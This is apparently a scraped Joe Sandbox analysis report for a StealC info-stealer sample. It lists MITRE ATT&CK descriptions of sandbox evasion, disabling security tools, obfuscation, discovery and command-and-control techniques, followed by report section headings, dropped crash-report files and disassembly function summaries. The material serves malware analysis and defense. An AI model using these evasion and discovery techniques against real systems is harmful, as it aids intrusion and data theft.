Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1f13Cs1ogc.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_1f13Cs1ogc.exe_d6c2601472a1e2329a283caeddd13e21ba0c439_01cc4f56_d1e131fd-d66e-4158-87c7-730795a95caa\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD1B3.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD221.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD261.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Windows Analysis Report
1f13Cs1ogc.exe

Function 00FE2021 Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 631
memoryCOMMON

Function 00FF8E2E Relevance: 4.7, APIs: 3, Instructions: 202
COMMON

Function 00FFA3A6 Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Function 00FF6368 Relevance: 3.0, APIs: 2, Instructions: 34
COMMONLIBRARYCODE

Function 00FF9FAA Relevance: 1.6, APIs: 1, Instructions: 147
COMMON